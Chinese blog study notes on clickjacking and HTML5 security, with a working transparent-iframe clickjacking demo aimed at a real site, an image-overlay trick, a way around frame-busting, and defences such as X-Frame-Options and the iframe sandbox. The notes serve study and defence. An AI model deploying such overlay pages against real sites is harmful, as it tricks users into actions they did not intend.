点击劫持ClickJacking+HTML5

最新推荐文章于 2024-05-11 17:46:39 发布
最新推荐文章于 2024-05-11 17:46:39 发布
阅读量1.1k 收藏
点赞数
分类专栏: 渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/39553615
版权

学习笔记而已 ~~~~~~~~~~~~~~~~~~~~~~~~~~

点击劫持 

是一种视觉上的欺骗手段,攻击者使用一个透明的,不可见的iframe 覆盖在一个网页上,然后诱使用户在该页面点击透明的iframe 网页,通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上

例子:

<!DOCTYPE html>
<html>
<head>
	<title>Click</title>
	<style>
	iframe{
		width: 2000px;//不可见网页的宽高
		height: 6000px;

		position: absolute;
		top: -5px;
		left: -440px;
		z-index: 2;//最顶层但是透明的

            -moz-opacity: 0;
            opacity: 0;
		filter:alpha(opacity=0);
		}
		button{
			position: absolute;
			top: 200px; //这是看见的网页的button
			left: 200px;
			z-index: 1;
			width: 500px;
		}
		</style>
</head>

<body>
<iframe src="http://www.qidian.com/Default.aspx" scrolling="no"></iframe>
    <button οnclick="alert(1)">you can you up!</button>
</body>
</html>


flash 点击劫持,图片覆盖攻击  XSIO

<a href="http://xxx.com.cn">
<img src="xxx.jpg" style=postion:absolute;right:320px;top:90px/>
</a>

还有可以在 手机应用上得到实习价值,   

tagjacking~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


防御: 

1)禁止跨域的iframe 来防范, frame busting

if(top.location != location){top.location = self.location;}

缺陷  js 代码写的 控制能力并不是特别强

攻陷方法为 嵌套多个 iframe 绕过

<iframe src="xxx1.html">

<iframe src="xxx2.html">

2)  X-Frame-Options    

DENY                        浏览器拒绝当前页面加载任何frame 页面

SAMEORIGN            同域下的页面

ALLOW-FORM origin 允许


HTML5

简要介绍

W3C 制定的新一代 HTML语言的标准。

一些新的标签 会存在XSS攻击的可能<video>  <audio>

https://github.com/cure53/H5SC   中有HTML5安全知识一个html工程


新增功能

html5 中为 iframe 定义了一个 sandbox 单独的源,其中的脚本被禁止执行,表单被禁止提交,插件被禁止
限制 其功能


<a> <area> 标签定义了一个新的link type noreferrer

<a href = "xxx" rel="noreferrer">test<a> 不再发送referer 保护敏感信息和隐私的考虑


canvas HTML5的最大创新之一。 标签让JS 直接操作图片对象,也可以直接操作像素

开发者甚至可以写小游戏


HTML5 也制定了新的同源标准  

www.a.com/test.html  ->origin->                                       www.b.com/test.php

www.a.com/test.html  <- access-control-allow-origin<-    www.b.com/test.php


跨窗口传递消息:

window.name 来跨窗口,跨域传递消息。

window这个对象几乎不受同源策略的限制的,

HTML5  为了丰富WEB开发者的能力, 新API: postMessage (firefox3 ie8,opera 9)

允许每一个window 包括当前窗口,弹出窗口,iframe等 对象往其他窗口发送文本消息,从而实现跨窗口的消息传递。这个功能也不受同源策略的限制

send:

<!DOCTYPE html>
<html>
<iframe src="http://1.hipanda.sinaapp.com/postMessage/receive.html" id="iframe"></iframe>
<form id="form">
	<input type="text" id="msg" value="Message To send"/>
	<input type="submit"/>
</form>
<script>
window.onload = function(){
	var win = document.getElementById("iframe").contentWindow;
	document.getElementById("form").onsubmit = function(e){
		win.postMessage(document.getElementById("msg").value);
		e.preventDefault();
	};
};
</script>
</html>
receive: 

<html>
    <b>receive msg!</b>
    <div id="test">Send me a message!</div>
    <script>
        document.addEventListener("message",function(e){
            document.getElementById("test").textContent = e.domain + " said: " + e.data;
        },false);
    </script>
</html>

但是不知道为什么  win.postMessage 执行不成功  是版本问题??


安全问题: 1)验证URL , 2)接受消息写入的地方 要进行检查

Web Storage  非关系型 数据库,Key-Value 对组成

设置一个值: window.sessionStorage.setItem(key,value);

读取一个值: window.sessionStorage.getItem(key);

firefox 好单独实现了一个globalStorage  基于SQLite

1)session storage  关闭浏览器就失效

2)local storage    会一直存在


可以将 XSS PAYLOAD 存储在 WEB STORAGE 中,实现跨域页面攻击






















pandamac
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
点击劫持漏洞原理和复现
weixin_54438700的博客
05-20 3155
一、漏洞原理 点击劫持Clickbandit),主要是利用HTML中iframe便签可以透明的属性进行利用攻击,其原理是通过在原本的网页上覆盖透明的框架并使受害者在不知情的情况下进行点击。漏洞主要是由于未对referer字段来源进行检验。常常配合csrf和xss。 图中,攻击者在原本网站上覆盖一个透明框架,受害者正常访问网站A,就会点击到这个透明框架B。攻击者常常利用该漏洞诱导受害者点击关键位置进行一些操作,比如转账、购买等危险操作。 二、漏洞复现 1.借助burpsuite工具,选择Clickb
点击劫持(ClickJacking)
sh0rk的博客
11-03 2680
点击劫持什么是点击劫持?方法进阶(本质上还是UI覆盖攻击,只是实现手段不一样)防御 什么是点击劫持点击劫持(ClickJacking),又称“UI-覆盖攻击”,通过覆盖不可见的框架误导受害者进行点击而造成的攻击行为。其本质是一种视觉欺骗。 方法 利用iframe或其他标签的属性构造一个精心构造的页面,诱导受害者进行点击。 &amp;lt;!DOCTYPE HTML&amp;gt; &amp;lt;html&amp;gt; &amp;...
web安全——点击劫持ClickJacking
Spontaneous_0的博客
01-15 671
web安全——点击劫持ClickJacking
2024年网络安全-点击劫持ClickJacking)的原理、攻击及防御,从三流网络安全外包到秒杀阿里P7,
最新发布
2401_84253089的博客
05-11 802
2008年,安全专家Robert Hansen 与Jeremiah Grossman发现了一种被他们称为点击劫持(ClickJacking)的攻击。他们准备在OWASP安全大会上公布并进行演示,但是由于很多平台都中了招,包括Adobe在内的厂商要求在漏洞修补前不要公开此问题。
HTML点击劫持,一种点击劫持的测试方法及装置与流程
weixin_39872334的博客
06-27 960
本发明涉及漏洞防御技术领域,具体地说是一种点击劫持的测试方法及装置。背景技术:点击劫持是一种视觉上的欺骗手段,攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击了透明的iframe页面。该透明的页面可能包含一些危险的动作,比如支付、下载木马等,但实际用户并不能看到该透明的页面,而是看到攻击者想要你看到的看似安全的网站。攻击者通...
html5点击,点击劫持ClickJacking+HTML5
weixin_35983438的博客
06-21 228
学习笔记而已 ~~~~~~~~~~~~~~~~~~~~~~~~~~点击劫持是一种视觉上的欺骗手段,攻击者使用一个透明的,不可见的iframe 覆盖在一个网页上,然后诱使用户在该页面点击透明的iframe 网页,通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上例子:Clickyou can you up!flash 点击劫持,图片覆盖攻击 XSIO 还有...
点击劫持”测试「Clickjacking Test」-crx插件
03-09
通过Offcon Info Security进行的Clickjacking测试。 此chrome扩展程序将检查是否可以对当前网页进行格式化,甚至生成用于安全报告的概念证明HTML。 支持语言:English
点击劫持漏洞案例ppt
01-02
点击劫持---clickjacking
clickjackingpoc:点击劫持攻击的概念证明
05-24
点击劫持PoC 旨在使您的点击劫持事件变得更好,更轻松的工具。 更新 现在,在服务器日志中捕获信誉,并添加一条消息,要求提供赏金! 概述 一种基于Web的ClickJacking PoC工具。 跑步 确保您已安装php(默认安装在...
Clickjacking Test-crx插件
04-02
语言:English Offcon Info Security的点击劫持测试 此chrome扩展程序将检查是否可以对当前网页进行格式化,甚至生成用于安全报告的概念证明HTML
no-clickjacking
05-16
点击劫持 Google Chrome扩展程序v1.1: Firefox扩展v1.1: Safari Extension v1.1: 变更记录 2013-11-19 更新了不透明度检查,将所有小于0.1的不透明度视为已隐藏。 某些站点已使用负值(-1)或非零值(0.01)...
点击劫持攻防入门
Web分享
01-11 4540
简介 点击劫持click jacking)也被称为 UI 覆盖攻击。它通过不可见框架底部的内容误导受害者点击,虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。 原理 这种攻击利用了HTML中标签的透明属性。 在 HTML 中,我们可以在 iframe 里面嵌套另一个网页。通过设置 iframe 的透明度,可以使 iframe 不可见,同
「第五章」点击劫持(ClickJacking)
hacckjacking
01-22 865
「第五章」点击劫持(ClickJacking) 「第五章」点击劫持(ClickJacking) 批注 [……] 表示他人、自己、网络批注 参考资料来源于 * 书中批注 * CSDN * GitHub * Google * 维基百科 * YouT...
web安全————clickjacking点击劫持
longger_lee
12-14 7382
点击劫持clickjacking)       点击劫持最早是在08年由安全专家Reboot Hansen和Jeremiah Grossman发现,这种攻击方式影响了几乎所有的桌面平台。那么什么是点击劫持??点击劫持其实是一种视觉上的欺骗手段,攻击者将一个透明的、不可见的iframe覆盖在一个网页上,通过调整iframe页面位置,诱使用户在页面上进行操作,在不知情的情况下用户的点击恰好是点击
web页面点击劫持
黑面狐
11-14 1747
今天看到一个google的点击劫持漏洞获得7500美刀,连接如下 https://apapedulimu.click/clickjacking-on-google-myaccount-worth-7500/   点击劫持漏洞,利用UI重叠,视觉上的欺骗的漏洞,用于钓鱼。 了解点击劫持可以参考freebuff这篇文章《浅析点击劫持攻击》 https://www.freebuf.com/ar...
说说什么是点击劫持
读万卷书,行万里路
09-07 1266
点击劫持ClickJacking)是一种视觉上的欺骗手段 。 攻击者使用一个透明的(即不可见的) iframe 页面,覆盖在一个正常网页上,然后诱使用户点击该网页,这时用户就会在不知情的情况下点击那个透明的 iframe 。 通过精心调整透明 iframe 的位置,就可以诱使用户恰好点击在所设计的恶意按钮上 。 请看下例: <!DOCTYPE html> <html> ...
关于使用accesskey进行xss攻击的总结
gc_msc的博客
09-05 1487
在一些文章中,对于hidden的元素进行xss攻击时,提到可以使用accesskey的方式进行。 根据实践,我使用了三个浏览器: chrome 68 firefox 61 IE 11 结果为:IE和chrome不支持hidden的accesskey,准确的说可能是不支持相关onfocus或者onclick事件,firefox支持 当快捷键相同时: chrome激活最后一个元素, I...
HTML5页面被运营商DNS劫持问题及解决方案,app中h5页面源码的获取
热门推荐
jia12216的专栏
10-28 2万+
App应用的html5页面经过运营商的移动网络(非wifi网络),被强制插入广告和手机管家的多余信息,在有些场景严重干扰用户的操作,也产生在美丽的页面上加入了不协调的悬浮层。并且这个手机管家类的悬浮层有时间出现,有时间不出现,神出鬼没,虽然你可以通过点击关闭,关键是突然出现,有时候还关闭不了。总之用户不喜欢这种用户不需要的选择,所以干掉它吧! 在app中h5页面源码,可以通过下面代码获得,其
点击劫持
giun的博客
03-04 439
一、前置知识 首先介绍下html下的iframe标签的作用: 可以创建包含另一个文档的内联框架。 例如下面这个代码。运行下面这个网页,发现他和网易安全中心的页面几乎一样,除了url不一样 &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"/&...
Clickjacking: X-Frame-Options header
01-10
Clickjacking是一种网络攻击,攻击者通过在一个网页上覆盖一个透明的iframe来欺骗用户点击一个看似无害的按钮或链接,实际上却触发了隐藏的恶意操作。为了防止Clickjacking攻击,可以使用X-Frame-Options头部来限制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值